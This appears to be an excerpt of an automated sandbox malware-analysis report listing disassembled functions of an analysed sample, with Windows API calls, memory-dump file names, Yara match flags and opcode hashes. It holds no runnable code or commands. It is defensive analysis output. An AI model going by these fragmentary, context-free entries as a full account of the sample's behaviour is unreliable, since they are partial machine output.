                                                                                                                        • Opcode ID: 5c9ab300f1d51a85aff2f73ac7b554a1c5f02f33fb0ebf885d0ae2eb1cb6ca82
                                                                                                                        • Instruction ID: d0c78ad7df2973e77c153748e99ba09a6044eb29329114e3cef2ae17c00338bd
                                                                                                                        • Opcode Fuzzy Hash: 5c9ab300f1d51a85aff2f73ac7b554a1c5f02f33fb0ebf885d0ae2eb1cb6ca82
                                                                                                                        • Instruction Fuzzy Hash: BD515CB1A146258FEB14CF65D8C57AABBF4FB88310F24842AD405EB290D3B59A54DF50
                                                                                                                        Function 0091688D Relevance: 1.6, APIs: 1, Instructions: 140timeCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00916D63,?,-00000004), ref: 00916941
                                                                                                                          • Part of subcall function 0092450A: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0091DE8B,?,00000000,-00000008), ref: 0092456B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharInformationMultiTimeWideZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1123094072-0
                                                                                                                        • Opcode ID: b51f1c27afa7fcee5b7faac37931f766cb5744a05307a827378be68d7dee6b00
                                                                                                                        • Instruction ID: 751b69dea16cd913b711486a96e1fe5423cc1d0c9ae62955de0811bfc336f1de
                                                                                                                        • Opcode Fuzzy Hash: b51f1c27afa7fcee5b7faac37931f766cb5744a05307a827378be68d7dee6b00
                                                                                                                        • Instruction Fuzzy Hash: 6D41A4B1E04219BFCF10AFA5DC06B9E7BACEF45750F118065FA14A72A1E7709E90DB90
                                                                                                                        Function 0596C7C8 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: 7111c669f6d44cbc8f8a6a43a232047415180a726c8752ab3431b2209ebd9888
                                                                                                                        • Instruction ID: 8d4e88d9bcf4962c0102fa59823bf64a77704c690d13eca1d1355fbe8f1d6e1f
                                                                                                                        • Opcode Fuzzy Hash: 7111c669f6d44cbc8f8a6a43a232047415180a726c8752ab3431b2209ebd9888
                                                                                                                        • Instruction Fuzzy Hash: 58C1EF346046468FCB38CFA8C588A7ABBBAFF45214F144A1AF4D797691D335AD0DCB60
                                                                                                                        Function 00922CC0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0091DF1A: GetLastError.KERNEL32(00000000,?,0091AB09), ref: 0091DF1E
                                                                                                                          • Part of subcall function 0091DF1A: SetLastError.KERNEL32(00000000,?,?,00000028,00914B7E), ref: 0091DFC0
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00922D14
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3736152602-0
                                                                                                                        • Opcode ID: 3a8d58283f66fd507279f17d7ab09f427a69a93d01a07829cb3c37dc8092c7c6
                                                                                                                        • Instruction ID: dbe2f85cb62ecbf995fed30a6b1f640322cb4f6b9a17a6abd951f2625f8d595a
                                                                                                                        • Opcode Fuzzy Hash: 3a8d58283f66fd507279f17d7ab09f427a69a93d01a07829cb3c37dc8092c7c6
                                                                                                                        • Instruction Fuzzy Hash: 7421C57261521ABBDB289F24EC42BBA73ACEF44304F10007AFD02D6185EB78ED45CB50
                                                                                                                        Function 05946450 Relevance: 1.6, Strings: 1, Instructions: 315COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ,
                                                                                                                        • API String ID: 0-3772416878
                                                                                                                        • Opcode ID: 074f1b3635a8e9b5ace491adf911b0c15371299d348c69fb7a58ef832e6417d7
                                                                                                                        • Instruction ID: f83e7e9891d33ceebe1452b0ab7a81d6f9f94678ab0588ecd46c07546de3f95a
                                                                                                                        • Opcode Fuzzy Hash: 074f1b3635a8e9b5ace491adf911b0c15371299d348c69fb7a58ef832e6417d7
                                                                                                                        • Instruction Fuzzy Hash: D2D17271A0526A9FCB25CB68CC40BEDBB71BF56300F0442EAD459A7742D7709E94CFA1
                                                                                                                        Function 00922958 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0091DF1A: GetLastError.KERNEL32(00000000,?,0091AB09), ref: 0091DF1E
                                                                                                                          • Part of subcall function 0091DF1A: SetLastError.KERNEL32(00000000,?,?,00000028,00914B7E), ref: 0091DFC0
                                                                                                                        • EnumSystemLocalesW.KERNEL32(00922A00,00000001,00000000,?,-00000050,?,009227E3,00000000,-00000002,00000000,?,00000055,?), ref: 009229CA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2417226690-0
                                                                                                                        • Opcode ID: 945b5e00c71dbd490dfc4123d57310c1bf856af3c8a8f32bd3b6b72d2f5994c6
                                                                                                                        • Instruction ID: 7fba44239203b538362c81516c989e4a573c521fc2eb29b89967d812fbd3a658
                                                                                                                        • Opcode Fuzzy Hash: 945b5e00c71dbd490dfc4123d57310c1bf856af3c8a8f32bd3b6b72d2f5994c6
                                                                                                                        • Instruction Fuzzy Hash: 3311C23B204705AFDB289F3998916BAB795FB84368B18442DE98787B44D371B982CB50
                                                                                                                        Function 00922DE0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0091DF1A: GetLastError.KERNEL32(00000000,?,0091AB09), ref: 0091DF1E
                                                                                                                          • Part of subcall function 0091DF1A: SetLastError.KERNEL32(00000000,?,?,00000028,00914B7E), ref: 0091DFC0
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00922E34
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3736152602-0
                                                                                                                        • Opcode ID: 4db88bd03d8f4f637da8ffd545bc300c2e4ef3a6ec5350cd8c04d67a04e7eec8
                                                                                                                        • Instruction ID: c9c9ce88564290b2e715984a779cdd217ffd2f2244be77affca23d0a02b63a29
                                                                                                                        • Opcode Fuzzy Hash: 4db88bd03d8f4f637da8ffd545bc300c2e4ef3a6ec5350cd8c04d67a04e7eec8
                                                                                                                        • Instruction Fuzzy Hash: F011067261111AABDB14AF28EC46BBA77ECEF44314B11417AF502C7281EB78E905DB50
                                                                                                                        Function 00930A00 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: 65be40d06735656bed258f1462c0659f0c9083f8566e15df3cdb0aefdaea6583
                                                                                                                        • Instruction ID: 0b31e225a4dccdf5b70c4557e374362973f4ebf03d61156cdf796291809b285d
                                                                                                                        • Opcode Fuzzy Hash: 65be40d06735656bed258f1462c0659f0c9083f8566e15df3cdb0aefdaea6583
                                                                                                                        • Instruction Fuzzy Hash: 0CD1B571C18FC587E7129B3D84432AAF3A0BFEA254F10D71AECD076652FB74A6858781
                                                                                                                        Function 00922C53 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0091DF1A: GetLastError.KERNEL32(00000000,?,0091AB09), ref: 0091DF1E
                                                                                                                          • Part of subcall function 0091DF1A: SetLastError.KERNEL32(00000000,?,?,00000028,00914B7E), ref: 0091DFC0
                                                                                                                        • EnumSystemLocalesW.KERNEL32(00922CC0,00000001,?,?,-00000050,?,009227AB,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00922C9D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2417226690-0
                                                                                                                        • Opcode ID: 783f40a4b832314f64ad5a9cf7f46c48a1a054d225153adbd698be3013f49829
                                                                                                                        • Instruction ID: eed299cc1d6b6be523b458e2e02889c155b81ada87b8fe0134862d96cdcc3a0d
                                                                                                                        • Opcode Fuzzy Hash: 783f40a4b832314f64ad5a9cf7f46c48a1a054d225153adbd698be3013f49829
                                                                                                                        • Instruction Fuzzy Hash: FDF0F6363043146FDB249F35E881ABA7B95EFC0368B09846CF9468B684C6B1AD42C750
                                                                                                                        Function 0091EE2D Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0091EF31: EnterCriticalSection.KERNEL32(-000673A9,?,0090FC09,00000000), ref: 0091EF40
                                                                                                                        • EnumSystemLocalesW.KERNEL32(0091EE20,00000001,0095F7F8,0000000C,0091E6E1,-00000050), ref: 0091EE65
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1272433827-0
                                                                                                                        • Opcode ID: 5ce99284433597d9acd15199596d5ca0495c9fe906c8fb1be6c36b72be3debf9
                                                                                                                        • Instruction ID: a000513dea9c01e3cd0f1bf088a1e59db8dee80ef8d96cdd98cf2e0b384a8796
                                                                                                                        • Opcode Fuzzy Hash: 5ce99284433597d9acd15199596d5ca0495c9fe906c8fb1be6c36b72be3debf9
                                                                                                                        • Instruction Fuzzy Hash: 41F04972A24204DFEB00EF99E846B9D7BF1EB88721F10456AF914DB2E0CBB55944DF50
                                                                                                                        Function 008D2E30 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 0-2852464175
                                                                                                                        • Opcode ID: 247e4253ff80c9b0d953cde07491702eaf629efde0f6514c361232a2c4bd5e71
                                                                                                                        • Instruction ID: 794940ed8cb1bf37e0982036d43ac7fa3bd3a5cde7d1424da176d47d17f1485a
                                                                                                                        • Opcode Fuzzy Hash: 247e4253ff80c9b0d953cde07491702eaf629efde0f6514c361232a2c4bd5e71
                                                                                                                        • Instruction Fuzzy Hash: D3B146756087019FC701EF28C89492EBBE6FFCA754F054A2DF986A7351EB30E9458B42
                                                                                                                        Function 00922D95 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0091DF1A: GetLastError.KERNEL32(00000000,?,0091AB09), ref: 0091DF1E
                                                                                                                          • Part of subcall function 0091DF1A: SetLastError.KERNEL32(00000000,?,?,00000028,00914B7E), ref: 0091DFC0
                                                                                                                        • EnumSystemLocalesW.KERNEL32(00922DE0,00000001,?,?,?,00922805,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00922DCC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2417226690-0
                                                                                                                        • Opcode ID: b6d81dd7bc12f8a1b85a2cf048cd46dfe617f61a810dd5b7c55f4ac17444375e
                                                                                                                        • Instruction ID: d7e08459eb8dd6e1a05ca1b5aeac149a6fc87ba70a65f0a4532070f84c0c53c2
                                                                                                                        • Opcode Fuzzy Hash: b6d81dd7bc12f8a1b85a2cf048cd46dfe617f61a810dd5b7c55f4ac17444375e
                                                                                                                        • Instruction Fuzzy Hash: E8F0EC3630031567CB049F35EC55B667F94EFC1755B4A4058EA058B294C6719983C790
                                                                                                                        Function 00866740 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00866753
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 1873d9fdb86fa3143bf3d9853f9cf433758a4f8cbfa661fc68aab627507b57f6
                                                                                                                        • Instruction ID: 31878bd2c8f221bcde72262cd944e13149218094233b50a261ffad886ecd5797
                                                                                                                        • Opcode Fuzzy Hash: 1873d9fdb86fa3143bf3d9853f9cf433758a4f8cbfa661fc68aab627507b57f6
                                                                                                                        • Instruction Fuzzy Hash: 44F08CB1801B209FD721AB79DD01697BBE4FF04754F05043DE646D6671EA32B9508B82
                                                                                                                        Function 0091E83C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,009118E3,?,20001004,00000000,00000002,?,?,009107E8), ref: 0091E870
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: 39e43295bbc0226a276ce8f7e2f2f4bf930951f6f4997a1a81b2c452977a0ff4
                                                                                                                        • Instruction ID: 0b9a0649e3f7fa46dd966dc98a89e3a292ba255d90eeb09f55606332f0b510fb
                                                                                                                        • Opcode Fuzzy Hash: 39e43295bbc0226a276ce8f7e2f2f4bf930951f6f4997a1a81b2c452977a0ff4
                                                                                                                        • Instruction Fuzzy Hash: 31E04F3160021CFBCF126F61DC04AEE7F19EF48761F044460FD0565161CB719960AB95
                                                                                                                        Function 008A09A0 Relevance: 1.5, APIs: 1, Instructions: 21processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008A09A7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateSnapshotToolhelp32
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3332741929-0
                                                                                                                        • Opcode ID: 1693164083dc75b6652135e8e141253280208043a6260c0c052e16fca7a8d57c
                                                                                                                        • Instruction ID: be636ac99aa8c93d68fb160f625b2820a99654c583153aaa9eee2dd0c4d183a3
                                                                                                                        • Opcode Fuzzy Hash: 1693164083dc75b6652135e8e141253280208043a6260c0c052e16fca7a8d57c
                                                                                                                        • Instruction Fuzzy Hash: D9B0922028030C21F42820A95D07B2A750D8783B34E240B11B73C8EAE22A816492089A
                                                                                                                        Function 0595510A Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: i-8
                                                                                                                        • API String ID: 0-3871616529
